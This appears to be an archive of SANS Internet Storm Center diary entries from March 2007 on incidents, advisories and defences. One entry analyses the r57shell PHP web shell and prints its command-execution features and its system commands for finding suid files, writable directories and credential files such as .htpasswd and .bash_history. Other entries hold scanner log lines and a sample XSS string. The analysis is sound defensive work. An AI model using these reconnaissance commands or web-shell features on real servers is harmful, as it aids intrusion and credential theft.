VBA32 3.11.2 03.22.2007 suspected of Downloader.Small.21 (paranoid heuristics)
VirusBuster 4.3.7:9 03.22.2007 no virus found
Webwasher-Gateway 6.0.1 03.22.2007 Virus.Win32.FileInfector.gen (suspicious)

Traffic from Yahoo?

Kurt writes to tell us that "It appears the yahoo owned ip ranges are nailing several of our websites enough to take the machines down."

If anyone else is seeing heavy volume from Yahoo addresses, let us know and include packets if you can.


We've had several readers mention that Firefox is out. You can get your copy from all the usual sources.

Spam in Any Language ...

Duncan writes in to tell us of some spam he was able to block
"F-Secure published an update around 10:12 GMT this morning after we sent them a sample, and Sophos released an IDE update at 13:19 GMT. F-Secure called it Trojan-Spy:W32/Agent.QY, and Sophos called it Troj/BanSpy-C.

Looking at the virus tracking logs we maintain, the 'outbreak' was more of a small flurry, as the entries for our custom ClamAV rule stopped by noon GMT, and there have been no hits across the 150ish node network for the vendor-given names.

The only affected domains were in the Netherlands, and hosted on MXs with '.nl' as the TLD - so I'm guessing the code did a quick and dirty to see if the MX was in the Netherlands before sending the mail."

Handler Maarten Van Horenbeeck was able to read the spam and notes:

"...the e-mail pretends to be from ABN Amro, a large Dutch bank.

The message is completely in Dutch and tries to get the user to execute the attached file "ms_ssl3_upd.exe". This supposedly enables SSLv3 support, which 'will be required as of tomorrow' to access their e-banking site. The e-mail contains a number of typos, strange use of words and exclamation marks which makes it obvious to any reader who looks at it in detail that it is in fact a spoof.

ABN Amro has had a Dutch press release on their site regarding this e-mail since yesterday:

Thanks Maarten

Chris Carboni - HOD


Published: 2007-03-22

Quick intro to auditing web applications.

Last time I taught the web application security workshop, students asked for a brief guide to assess their own web applications for common problems. So I sat down and wrote up a little paper outlining how I typically go about when I try to take a quick look at a web application. Sadly, while this is a very quick and incomplete "audit", many web apps I am asked to look at fail.

For the complete article see: www.sans.edu/resources/securitylab/audit_web_apps.php .
(While you are there... take a look at the Leadership and Security lab links at the top of the page for more articles)

And for all ISC/ DShield users: I will be in San Diego in two weeks to teach the Linux/Apache/MySQL/PHP class. If you happen to be at SANS 2007: We will probably have a BoF session. Watch the announcements for details.


Published: 2007-03-21

Must be the month of the PHP bugs... and Morfeus is trying them out

So, I assume by now you all know it is the "Month of the PHP bugs" but besides the tons of PHP advisories what else have we been seeing?

Well, today fellow handler Jim Clausing started an interesting thread posting his Apache logs which contained lines upon lines of: - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]= HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner" - - [21/Mar/2007:02:22:45 -0400] "GET /components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path= HTTP/1.1" 404 1042 "-" "Morfeus F*****g Scanner"

so, curious about Morfeus (which, incidentally, is an old tool) hitting my own systems I went off to check my own logs:

tempest:~$ grep php www-access.log | grep Morfeus | cut -f 1 -d' ' | sort -n | uniq
tempest:~$ grep php www-access.log | grep Morfeus | wc -l

Aside from the different host scanning, it is pretty clear that Morfeus has been on my boxes too.

First observation: Morfeus doesn't care about what you might have set your Apache ServerTokens to (which is still a good trick against Netcraft abusers but not against script kiddies). Mine are set to give nothing away (and no, PHP is not installed) but they still scanned me.

Second observation: this is such a "noisy" scan that Jim said that he had turned off the Bleeding Edge Snort signatures and therefore only caught it when he got an alert from OSSEC (an open-source HIDS). It is never good news when signatures are turned off because they are too noisy but, at least in this case, I think we can safely assume that Jim noticed the scans the first time round.

Third observation: if you are running a site with PHP this is not an enjoyable month...


Published: 2007-03-20

Trust Relations, Defense in Depth, and Printers

Recently, I ended up doing a bit of consulting work for a couple of friends who work for a large scale printing shop.  These couple of techs are actually fairly security concious and are moving toward a fairly good network/system architecture for a small business network.  They do take all the appropriate measures to keep the production servers away from the test and development systems and from the general workstations. So if you include the large scale printing system as a separate entity and effectively another security realm, then we have 4 security realms.  When you look within the 3 of the 4 realms, they do have additional layers of security as they have a reasonably good patch management system, and use personal firewalls and anti-virus products as appropriate.  And the shop is small enough that the staff have endured training on good passwords, opening unexpected attachments in email, not visiting websites that are not business related.  And because of all of their defenses internally, they rarely have any incidents.  Even their broadband DSL provider does some amount of filtering for this mom and pop business as a part of the business agreement. which in reality probably amounts to filtering the netbios ports, sql server and few other wide scale attack vectors.

However, despite the best efforts of the IT staffer (all 2 of them), they had an odd incident.  They were contacted last week via the postmaster@ address stating that their mail server was compromised and was spewing spam. They went to their mail server and looked at its logs and couldn't see anything amiss with the system.  Through a bit of correspondence, they received a copy of the original spam email with full headers.  Turns out it was their test mail server was the one acting as the relay not the production server..  However, the test server was configured to only accept mail from local systems while testing.  The little sonicwall firewall they had even configured to ensure that no one outside of their business could even start a connection to that system.  However, the test server was allowed to start connections itself.   Looking closely at the logs on the test system they identified that their black box of a printing press was the system that was spewing the spam.  Confused at what was going on, they contacted me.

It turns out that despite their defense in depth mentality, it all came crumbling down because of a single system.  When they purchased this brand new state of the art  digital printing press, it came with a Unix based computer that acts as print queue repository, controller, web server, and countless other nifty features to make their life easier and better.   However, as you can see below the Unix system has many services installed and operational.  And the company that supports this printing press had requested that they have internet access to the system should a problem arise and the small business calls in for support.

To the best of my ability to look into the compromised system, it appears that the system was compromised through either an SSH or a web server vulnerability (both logs had been purged so I have a "chicken or the egg" problem).  Once compromised, the attacker turned around and added some software to the webserver directory to help keep remote access to the system, and appears to have probed inside the local network to identify local mail servers.  It found both the production server and the test server and used both of them to spew the junk mail.   Thankfully, the production mail server had anti-spam software installed on it which deleted the vast majority of the mail sent through that system (too bad for the spammer  :-) )

As a lessons learned, the company is actually pretty good at their security mindset.  However, one system potentially could have blown  the overall security posture of all of the other security realms in their organization due to the trust relations.   The manufacturer of the printing device should be chastised for making a system that has so many services enabled without documentation on what needs to be enabled for what types of activities.  For those that think you can figure out all of that without proper documentation, please see the results of the nmap scan and you will see why i think  it is a little more difficult then just a deny all policy and try to add back ports one a time.   

(The 65479 ports scanned but not shown below are in state: closed)
21/tcp open ftp?
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
80/tcp open http Apache httpd
111/tcp open rpcbind 2-4 (rpc #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
515/tcp open printer
609/tcp open rpc.unknown
614/tcp open ndbserver58 1 (rpc #536871002)
631/tcp open http Apache Tomcat/Coyote JSP engine 1.1
1234/tcp open hotline?
2020/tcp open xinupageserver?
2049/tcp open nfs 2-4 (rpc #100003)
2346/tcp open unknown
4045/tcp open nlockmgr 1-4 (rpc #100021)
4321/tcp open rwhois?
6000/tcp open X11 (access denied)
6080/tcp open tcpwrapped
7100/tcp open font-service Sun Solaris fs.auto
8009/tcp open ajp13?
8080/tcp open http Apache httpd 1.3.31 ((Unix))
9021/tcp open unknown
32771/tcp open status 1 (rpc #100024)
32772/tcp open fmproduct 1 (rpc #1073741824)
32773/tcp open metad 1-2 (rpc #100229)
32774/tcp open mdcommd 1 (rpc #100422)
32775/tcp open rpc.metamedd 1 (rpc #100242)
32776/tcp open metamhd 1 (rpc #100230)
32777/tcp open mountd 1-3 (rpc #100005)
32784/tcp open rpc
32785/tcp open dtcm 5 (rpc #1289637086)
32808/tcp open rpc
32811/tcp open rpc
44492/tcp open rpc.unknown
44493/tcp open unknown
44504/tcp open unknown
44505/tcp open rpc.unknown
44515/tcp open rpc.unknown
44516/tcp open rpc.unknown
44517/tcp open ndbserver67 1 (rpc #536871011)
44520/tcp open unknown
44523/tcp open rpc
44528/tcp open rpc.unknown
44536/tcp open unknown
44537/tcp open unknown
44538/tcp open unknown
44539/tcp open unknown
44540/tcp open unknown
44541/tcp open unknown
44542/tcp open unknown
44558/tcp open rpc.unknown
44559/tcp open rpc.unknown
44586/tcp open rpc.unknown
44744/tcp open rpc.unknown
45693/tcp open rpc.unknown
46380/tcp open rpc.unknown


Published: 2007-03-19

Some chatter on information security

Small talk we picked up today:

  • ENISA has released a new analysis of emerging risks in information security.  While some of the scenarios are a bit science-fiction like, the interesting thing about this document is that, unlike many vendor reports that cover the past year or so, it looks at where IT is going in the future and then tries to pin point viable threat agents.
  • Experts from countries belonging to the Shanghai Cooperation Organization (the other SCO) are meeting to discuss information security from March 19th to 23rd in Beijing. We for one are very interested in this evolution, as contacting incident response teams in the affected countries, China, Kazachstan, Kyrgyzstan, Russia, Tajikistan and Uzbekistan to respond to incidents often proves difficult.
  • An anonymous reader wrote in that the PF_RING kernel patch, used for fast packet capturing on Linux, now supports blooms filters. Luca Deri, the PF_RING author, describes some of the performance advantages here.


Published: 2007-03-19

Assessing websites for malicious content

If you are responsible for information security within your organization, part of your job content probably consists of reviewing sites that have been submitted by your users. Perhaps in a response to a request to allow access to the site through a URL filtering application, to review whether a site may have contributed to a virus outbreak or to review your own corporate website. Last week, Michael wrote in wondering what the best approach is to do these types of review.

Fact is that you can make this process as heavy as you wish, depending on the importance of the site to your organization and the risk/impact of allowing access to it. Each review however should start with an off-line component, that is without accessing the site itself, followed by an on-line component, which entails a connection. The first is important to assess what the site could logically be expected to do, the latter to see how it makes your end user's systems behave.

As part of an off-line review:

  • Verify the whois information. The corporate website of a bank is not often registered yesterday. A US bank is also not often registered by a contact in Nigeria. Some of the information can be checked for validity, such as zip codes and telephone numbers.
  • There are on-line tools that can help you assess the site. McAfee's SiteAdvisor for example allows you to submit sites for review. If the site has already been submitted before, it gives you information on downloadable executables, a history of spam after registering on the site, as well as information on outbound links and usage of cookies.
  • Web blocklists such as malware.com.br provide realtime HTTP blocklists. You can download the existing blocklist and match domains with it, or submit a new URL and have it tested.

If these do not turn up anything unusual, it's time to make a connection to the site:

  • In order to have the most objective view of what the site is doing, I download the site using the common wget tool. Use of the the -p option will download all files that are necessary for a browser to interpret it (such as inline images and stylesheets) that can then be scanned manually for malicious script tags as well as through any AV solution. Smart use of -r and -l  will make the tool download the site to the depth that you require it to be analyzed. Keep in mind that these may pose undue stress on the web server, especially if pages are dynamically generated, so be gentle. A good alternative is curl. As some sites base their response on the type of browser connecting, you can imitate specific ones by using the --header option.
    When you're dealing with new malware, an AV solution that has good heuristics detection can prove valuable. Back in the '90s, one specific solution, no longer on the market, reported in great detail on what an executable was up to - did it become memory resident (the good old DOS TSR code), did it scan the disk for other executables, did the extension not match with the code. Something to that degree is difficult to find, but excellent for this purpose.
  • Connecting through a proxy can pre-empt execution of the more obvious threats and help in identifying malicious or potentially dangerous links. Two weeks ago we covered SpyBye, a proxy tool specifically written for this purpose.
  • If this does not turn up anything malicious, I generally use a virtual machine such as VMWare, with a browser installation very similar to that on the corporate desktops. In addition, the box is running at least regshot, filemon and tcpview to assess for any strange activity taking place upon connecting to the site. I also run a sniffer to see whether any strange traffic is originating from or being generated towards the virtual machine. Additional toolbars such as the Firefox web developer toolbar allow you to see much more information than you usually would (CSS, ...)

Especially in the case of targeted malware, using a sacrificial lamb machine on dialup, using even different DNS servers, might be wortwhile. However, if your organisation is the only one targeted, it might also reveal you are investigating the matter. This is an obvious tradeoff. Also note that even simple tools you use during the investigation can have vulnerabilities, such as wget.

This overview merely covers basically how to assess a site. It doesn't go into detail on assessing the actual malicious code, should you find any. Other diary entries have covered this in more depth here and here.

No doubt you have many other great ideas on how to approach this issue. Do you know of good browser plugins, proxies, websites and other tools fit for this purpose ? Let us know.

v2: Thanks to Swa for his feedback and suggestions.


Published: 2007-03-18

IE adoption rate

If you read our diary articles for a while, you for sure have seen regular entries encouraging you to use other browsers than IE. Now we all expect security minded people to make other choices in what browser they use compared to the general public visiting non technical web sites.

So do security minded people actually choose other browsers compared to the general population(*) ?

IE adoption

This chart looks at  two populations and measures how many visitors use a version of IE to visit that web site. As expected the percentage of visitors using a version of IE on a security related web site is significantly lower than on generic web sites.

It's interesting to note that
  • Firefox versions are about as popular in the security minded population as IE versions.
  • These values hardly changed at all over the past 12 months, there's a very slight downward trend, but it's so small that it'd need serious thoughts from a statistical perspective before drawing any conclusions (graph not shown).

I've been looking at the evolution in IE 7's adoption since it got released and subsequently put on automatic updates with great anticipation as it would allow me to stop supporting IE 6's bugs when dealing with CSS.

IE adoption

This graph lists the percentage of IE using visitors that have upgraded to IE  version 7. The blue graph is for the security minded population and the red graph is for the generic population(*).

Security minded visitors seemed to have upgraded their browsers much before the release of IE 7, and had a head start in adoption rates. Both populations seem to have slowed their adoption of IE 7 in the last months. Security minded users seem to be at risk of loosing their adoption rate head-start.

(*) Data collected on web sites where I have access to the Google Analytics statistics, so any accuracy of browser identification is the same as for Google's Analytics. Due to this, this data completely ignores people having blocked javascript by default (e.g. by using Firefox and NoScript).
Data used to write this report contained no personal identifiable information and was collected using this website for the security minded population and from a travel website for the general population.

Swa Frantzen -- NET2S


Published: 2007-03-17

IE7 - XSS against local resource - CVE-2007-1499

In the past few days a new vulnerability was discussed publicly: a Cross Site Scripting (XSS) vulnerability against a local resource in MSIE 7 on at least Windows XP and Vista.

The vulnerability is in a local page displaying a "Navigation to the webpage was canceled" message with a "Refresh the page" link. An attacker can send a browser following a crafted link to this local resource, making it display a faked address on the address bar and using scripting to make the refresh this page link into go to a page of his/her choice.
Do not mix the refresh this page link with the refresh button on the browser.

This might be useful in a phishing attack, but it does sound rather complex and requires the user to jump through the hoops.

CVE-2007-1499 (NIST's version), Mitre's version should get updated at their next update of the website.

I've also update the "missing Microsoft patches" table, so we'll track it.

Swa Frantzen -- NET2S


Published: 2007-03-17

Remote File Inclusion Attempts

The Report:

Chris wrote in this morning reporting: "a group from Turkey who have been trying really hard to inject this PHP exploit into my web site."
From the log snippet supplied it appears on the surface to be a Remote File Inclusion attempt.  PHP applications vulnerable to such attacks allow an attacker to execute their own code on the web-server with a simple crafted request.

More information about Remote File Inclusion can be found:

The attackers attempted to include code from alganx.by.ru called r57.txt.

Passive Investigation:

We begin first with low-impact analysis with a few digs, whois' etc.

alganx.by.ru. 9h14m49s IN A

by.ru. 9h14m49s IN NS ns2.by.ru.
by.ru. 9h14m49s IN NS ns3.by.ru.
by.ru. 9h14m49s IN NS ns1.by.ru.

ns2.by.ru. 9h14m49s IN A
ns3.by.ru. 9h14m49s IN A
ns1.by.ru. 9h14m49s IN A

Maxmind's GeoIP places the IPs in Moscow.  Let's see if RIPE.NET agrees...

% Information related to ' -'

inetnum: -
netname: EVERNET
descr: Free web hosting
country: RU
admin-c: amg28-ripe
tech-c: amg28-ripe
status: ASSIGNED PA "status:" definitions
source: RIPE # Filtered

person: Aleksei M Golubev
address: Moscow, Russia
e-mail: noc@ever.ru
remarks: phone: +7 095 7712007
phone: +7 495 7712007
remarks: fax-no: +7 095 7712007
fax-no: +7 495 7712007
nic-hdl: AMG28-RIPE
source: RIPE # Filtered
remarks: modified for Russian phone area changes

And also:

% Information related to ' -'

inetnum: -
descr: Sky-Media Ltd. network
remarks: You aren't right!
country: RU
admin-c: SKYM-RIPE
tech-c: SKYM-RIPE
status: ASSIGNED PA "status:" definitions
source: RIPE # Filtered

address: Sky-Media Network Operation Center
address: 9, Sushevsky Val
address: 127018 Moscow Russia
phone: +7 495 9816042
abuse-mailbox: abuse@skyme.ru
admin-c: DD5555-RIPE
admin-c: PS5555-RIPE
admin-c: SO796-RIPE
tech-c: PS5555-RIPE
tech-c: SKYM-RIPE
nic-hdl: SKYM-RIPE
source: RIPE # Filtered

This leaves me with a couple of email address I can try for getting the file removed.

We continue passive investigation with a bit of googling around.  With the recent malicious javascript incidents that I've been working on you can get a gauge of the extent of the distribution of the malicious links.  This is different, since in RFI you'll see the code in the access logs, not as live links littered through people's blogs.  In today's incident we turn up that r57.txt has been around for quite a while.  One can find this being discussed as far back as 2004-- well one can find discussions about r57.txt, the file name, appearing in their access logs.

Grabbing the File

The next step is to grab a copy of r57.txt to see what it does.  Using wget it is straightforward in this case.  I clamscan it out of habit and it scans cleanly.  Though visual inspection I can tell that this is a copy of the r57shell-- because it says so in the header.  Fear my reverse engineering skillz.

So What Does this Actually Do?

Let's assume that this actually worked.  How bad of a day is Chris going to have?

From simply looking at the code, I would venture to say that a compromise like this is very bad.  It allows the attacker near-shell access.  Depending on the permissions that PHP is running under, this could lead to a total compromise of the system.

It supports both Russian and English languages.  It will talk to MySQL, Postgres, or Oracle databases. 

The multi-language support exposes a lot of the codes features, from the English support definitions:

/* --------------------------------------------------------------- */
'eng_text1' =>'Executed command',
'eng_text2' =>'Execute command on server',
'eng_text3' =>'Run command',
'eng_text4' =>'Work directory',
'eng_text5' =>'Upload files on server',
'eng_text6' =>'Local file',
'eng_text7' =>'Aliases',
'eng_text8' =>'Select alias',
'eng_butt1' =>'Execute',
'eng_butt2' =>'Upload',
'eng_text9' =>'Bind port to /bin/bash',
'eng_text11'=>'Password for access',
'eng_butt3' =>'Bind',
'eng_butt4' =>'Connect',
'eng_text15'=>'Upload files from remote server',
'eng_text17'=>'Remote file',
'eng_text18'=>'Local file',
'eng_text21'=>' New name',
'eng_text23'=>'Local port',
'eng_text24'=>'Remote host',
'eng_text25'=>'Remote port',
'eng_butt5' =>'Run',
'eng_text28'=>'Work in safe_mode',
'eng_text29'=>'ACCESS DENIED',
'eng_butt6' =>'Change',
'eng_text30'=>'Cat file',
'eng_butt7' =>'Show',
'eng_text31'=>'File not found',
'eng_text32'=>'Eval PHP code',
'eng_text33'=>'Test bypass open_basedir with cURL functions',
'eng_butt8' =>'Test',
'eng_text34'=>'Test bypass safe_mode with include function',
'eng_text35'=>'Test bypass safe_mode with load file in mysql',
'eng_text40'=>'Dump database table',
'eng_butt9' =>'Dump',
'eng_text41'=>'Save dump in file',
'eng_text42'=>'Edit files',
'eng_text43'=>'File for edit',
'eng_text44'=>'Can\'t edit file! Only read access!',
'eng_text45'=>'File saved',
'eng_text46'=>'Show phpinfo()',
'eng_text47'=>'Show variables from php.ini',
'eng_text48'=>'Delete temp files',
'eng_butt11'=>'Edit file',
'eng_text49'=>'Delete script from server',
'eng_text50'=>'View cpu info',
'eng_text51'=>'View memory info',
'eng_text52'=>'Find text',
'eng_text53'=>'In dirs',
'eng_text54'=>'Find text in files',
'eng_text55'=>'Only in files',
'eng_text56'=>'Nothing :(',
'eng_text57'=>'Create/Delete File/Dir',
'eng_text61'=>'File created',
'eng_text62'=>'Dir created',
'eng_text63'=>'File deleted',
'eng_text64'=>'Dir deleted',
'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
'eng_text72'=>'Text for find',
'eng_text73'=>'Find in folder',
'eng_text74'=>'Find in files',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'Search text in files via find',
'eng_text77'=>'Show database structure',
'eng_text78'=>'show tables',
'eng_text79'=>'show columns',
'eng_text83'=>'Run SQL query',
'eng_text84'=>'SQL query',

Some of the examinations it performs on the system (also straight from the code):

'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find / -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',

You can see it's looking for vulnerable points in system (suid files with potential vulnerabilities of their own, writable directories to use, etc.)  It also grabs passwords and hashes for offline attacks.

It has shellcode to allow the attacker to run a bindshell on the compromised server, or to open up a reverse shell to an attacker's system.

It reports on  system monitoring statistics, so you don't place too much load on a system with your antics.  It helps the attacker determine what tools (wget, fetch, lynx, links, curl, etc.) on on the system to pull down additional tools/file.

So if we assume that PHP isn't running uid 0 already, the attacker is able to investigate the filesystem on the server, and likely upload and execute any code they wish.  Which means that root-access isn't far off.

This would end up being a very bad day for anyone to have this happen to their system.

Vulnerable Systems

Remote File Inclusion is a sub-set of Input Validation Attacks.  It is a fairly common (sadly) vulnerability.  Now many weeks go by where there is not an announced RFI in some PHP application or other.  There's over 800 examples in Secunia's vulnerability database.  Register_globals is big entry point these, and it's common hardening advice to disable it.

Quick fix from fellow-handler Swa:

"In the php.ini:

register_globals = On
register_globals = Off
(or add the latter)

While at it, change:
allow_url_fopen = On
allow_url_fopen = Off
This latter disables remote includes

You'll likely need to restart the webserver after this for the updates to
take effect."

Previous Incidents

r57shell was mentioned in an earlier diary.



Published: 2007-03-16

Ongoing interest in Javascript issues

    A number of today's posts to the handler's list were related to Swa Frantzen's "Javascript hiding everywhere" post.  The fact that javascript can be used, as he mentioned, to capture keystrokes or upload files should be cause for concern and reason to disable javascript whenever possible.
    I too have used the Noscript extension with firefox for a long time.  It allows me to enable javascript for the few trusted web sites that need it and disable it by default for all other sites.  Recommended.
    A few web sites try to force viewers to enable javascript by making their home page something like:
[script language="JavaScript"]
window.location.href = "index.php";
    By simply looking at the source for the home page, one can figure out that index.php is where the web site lies, and sure enough, the remainder of the web site comes up just fine without javascript.
    -- Bill, http://www.stearns.org/


Published: 2007-03-15

Javascript hiding everywhere.

Frequent readers will know that we often recommend to ease up on allowing scripting as it's used by the bad guys. XSS bugs are basically so bad, not for the example <sc ript>alert('XSS')</sc ript> (spaces added for the overly paranoid web content filters) you might see, but for much nastier things starting with capturing your cookies (read credentials, session keys etc.). Keyloggers aren't impossible either and making you unknowingly upload files  from your hard disk to malicious websites etc. is all quite possible in javascript.

And if you supposed it stops in your browser seeing javascript in HTML pages themselves, think again:


Apple software designers/coders must have thought it a cool idea to allow javascript inside a quicktime movie. Yep a movie isn't just some moving images, but it can be just as well contain (malicious) code that will be executed by the movie viewer that gets embedded in the pages you show. Didier Stevens has a blog entry about it, explaining it in detail.


If you use flash, you already have cookies not just in your browser, but also in your flash player. You can see the settings of the flash player's use of such storage here: http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager02.html . Do take care fiddling with your settings, you can easily make flash not working all that well anymore if you do it a bit too much (speaking from experience here). That settings pane/web page doesn't seem to mention to the casual user that flash also supports javascript, nor that it has already been hit by XSS issues in the past: e.g. this August 2002 article is about one such problem.


Unfortunately PDF files aren't safe from allowing javascript and have had their share of problems with it as well.


Contains just music, right? Well many will be copyright lawsuits waiting to happen if you let the music industry, but yep they too can contain scripting. Granted you might need quicktime installed to get to it, but most iPod owners will have iTunes and that comes with Quicktime bundled into it ...


Unfortunately there are many more formats that allow remote code execution by allowing scripting or extensive macro languages.

If there's a lesson to be learned, it might well be that you need to continue to look out for scripting languages, cookies and more even hidden in places you might not expect them to creep into.

If you have good workable solutions to prevent scripting in all these media rich formats, let us know.

Swa Frantzen -- NET2S


Published: 2007-03-14

MS Windows 2003 SP2

Looking deeper into the security aspects of Windows 2003 SP2, we received a list of known CVEs that are supposed to be fixed in SP2 for Windows 2003:

CVE name Affected Reference
CVE-2006-5578 MSIE 6 MS06-072
CVE-2006-3443 Winlogon MS06-051
CVE-2006-3281 MSIE 6 MS06-045
CVE-2006-2385 MSIE MS06-021
CVE-2006-2379 TCP/IP stack MS06-032
CVE-2006-2375 ? ?
CVE-2006-2218 MSIE 6 MS06-021
CVE-2006-1388 MSIE 6 MS06-013
CVE-2006-1315 Server Service MS06-035
CVE-2006-1313 Microsoft JScript MS06-023
CVE-2006-1192 MSIE MS06-013
CVE-2006-0026 IIS MS06-034
CVE-2006-0021 TCP/IP stack MS06-007
CVE-2006-0006 Media player MS06-005
CVE-2005-4089 MSIE MS06-021
CVE-2005-3240 MSIE race condition MSRC blog
CVE-2005-2388 USB driver ?
CAN-2006-1626 MSIE MS06-021
CAN-2005-2129 ? ?
CAN-2005-2123 WMF MS05-053
CAN-2005-0944 Jet DB CERT vuln id 176380
CAN-2005-0803 EMF MS05-053
CAN-2005-0109 Hyperthreading support CERT vuln id 911878
CAN-2004-1331 MSIE CERT vuln id 743974
CAN-2004-1173 MSIE ?
CAN-2004-1060 TCP/IP stack MS05-019

There are a number of interesting things in here for sure.

Swa Frantzen -- NET2S


Published: 2007-03-14

Allaple worm

This comes from one of our friends over at the Finish cert team CERT-FI / FICORA.

"CERT-FI has been tracking the situation with the Allaple worm
for about 8 months now. We have traced the evolution of the
worm since the first variants came out.

Allaple is a polymorphic worm. The first variants spread through
Radmin installations that had weak passwords.
Every variant so far also tries to locate
all html files on the harddisk to prepend an <object> -tag
into the file to ensure activation of the worm when a local
webmaster views the files. Traces of this behaviour can be
seen on some websites: There's an <object> tag right below the
<html> tag in the page, with the source pointing to a random

The first variants were DDOSsing only 1 target and the DDOS was a basic
SYN flood. Shortly there after another target was added to the DDOS routine in the

A bit after that the spreading mechanisms were changed from
Radmin scans to basic catering of Windows exploits,
and yet another target or victim was added.

The SYN DDOS routine has been the same from the first variant
to the latest variant available. Early in the winter code was
added to do HTTP GETs on the target websites. A few other ports
were also targeted. One site is currently getting gentle packet
love on tcp ports 22,80 and 97. Another site is getting packets and
HTTP gets on port 80, and yet another is getting packets on
ports 80 and 443.

The worms have absolutely no Command and Control channels in them.
Once released, there is no way to make them disappear. Their sole
purpose is to spread and DDOS.

In case you are in the correct position, and you feel you would
want to help in this pesky problem, here are a few tricks you can
use to identify Allaple variants on the loose in your networks:

1) ICMP packets with the string "Babcdefghijklmnopqrstuvwabcdefghi",
sans quotes, in the payload.
2) Echo requests to entire networks including host octets of 255 and 0.

We have reason to believe that there will be more variants,
it's just a matter of time when a new one pops out into the open.

CERT-FI is interested in any information or observations regarding the DDOS
or the malware itself. We can be contacted at cert(at)ficora.fi"


Published: 2007-03-14

Mac OS X patches

Well, looks like this month we get more Apple fixes than Windows patches for a change. Mac OS X 10.4.9 is out, and according to US-CERT, this is an upgrade that plugs "arbitrary code execution and SYSTEM level access" type of vulnerabilities. Sounds like a fix even Apple fanboys with lots of faith into the unbreakable nature of their system should consider applying real soon. The same fix covering only the security portion but leaving out the functionality upgrade is also available as Security Update 2007-003, and installs on 10.3.9. More information on both can be found on the Apple Docpage.


Published: 2007-03-14

The end of the trend

I used to be an avid reader of the port statistics of my firewalls, because I can remember a time when they actually told me something. Lately though - it must have started in the second half of 2006 - I've come to the conclusion that the daily stroll through the firewall stats isn't much worth my time anymore. Purists always considered "enumerating badness" as one of the dumber things to spend your time on, but fact is that statistical analysis of firewall drop logs did in the past successfully act as an early warning system for new nasties. My guess (and your opinion is of course entitled to differ) is that these days are past. Looking at my firewall stats, I see lots of things making their way to the top of the trend radar and blinking at me in scary red. Investigation turns out that it is - who knows what, some botnet gone wild, some kid boldly scanning the port no kid has scanned before. For the past months, things on top were invariably neither a trend nor a new attack, simply a random escape of the Internet's intestinal gas.

What really made me think though was the conspicious absence of telnet scans when the Sun snafu came to light a few days back. My stats, while covering lots of IP space, didn't show the scary bright red upswing of tcp/23 badness that - I admit - I was almost gleefully waiting for. Careful manual inspection then showed that - oh! - the telnet probing did happen at my perimeter, but it was well below the level of all that noise that makes it to the top of the "trend" radar. On one day, where a single IP address from South Africa slowly probed a good portion of my IP space for telnet, we also got slammed by a 2000-nodes-in-parallel scan for tcp/17458. And. And. Enough to make the telnet thingy rank on position 84, way below my attention span.

As a couple folks who are more savvy at inspecting network traffic than I am have suggested, trending and comparing the in/out flows on ports that are permitted through the firewalls is of much more value than converting the hits on dropped ports into colorful statistics. They are right - but, alas, as most commercial firewall log analysis tools show, enumerating badness is so much easier to do...


Published: 2007-03-14

OpenBSD IPv6 remote vulnerability

OpenBSD 3.9 and 4.0 have fixed an issue to correct a problem in the IPv6 stack.

Source code patches are available at:
For  workarounds, and if you do not need IPv6, you can use the following (it will block all IPv6):

# vi /etc/pf.conf
Add a line:
block drop in inet6 all
# pfctl -f /etc/pf.conf
To load the new rules in the pf packet filter
# pfctl -s rules
Check the rule got loaded in the runtime rules.
The workaround does disable all incoming IPv6 packets on the machine.

The patch itself is a kernel patch, so you will need to recompile a kernel, install it and reboot the affected machines.

Swa Frantzen -- NET2S


Published: 2007-03-13

Good malware reversing article from Websense

Here is a good article from the Websense labs folks.  Apparently, a large bank in Norway has been fighting a massive infection of this malware.  The binary has multiple levels of advanced techniques that prevent against reversing.  If you want to get a peek inside some malware authors tricks (if properly motivated and educated), then this is a good article to read.


Published: 2007-03-13

DST Wrapup

At the risk of continuing a dead story, we are still getting reports of DST issues and annoyances. I can summarize most of it by saying that people are still having problems and having to resort to strange solutions. I'm expecting that this is going to continue for weeks and for some vendors that didn't get it right this time, I expect the same problem next year.

Without trying to downplay the issues that people are seeing with their servers/workstations clocks being off, we haven't heard any really bad stories of SCADA system failures, medical equipment failures, avionics failures, etc. I am curious to know if this affected any "mission critical" systems that support basic life. I am guessing that we will be reading about them soon in the RISKS newsletter  (catless.ncl.ac.uk/Risks).


Published: 2007-03-13

Release candidate for Windows Server 2003 SP2

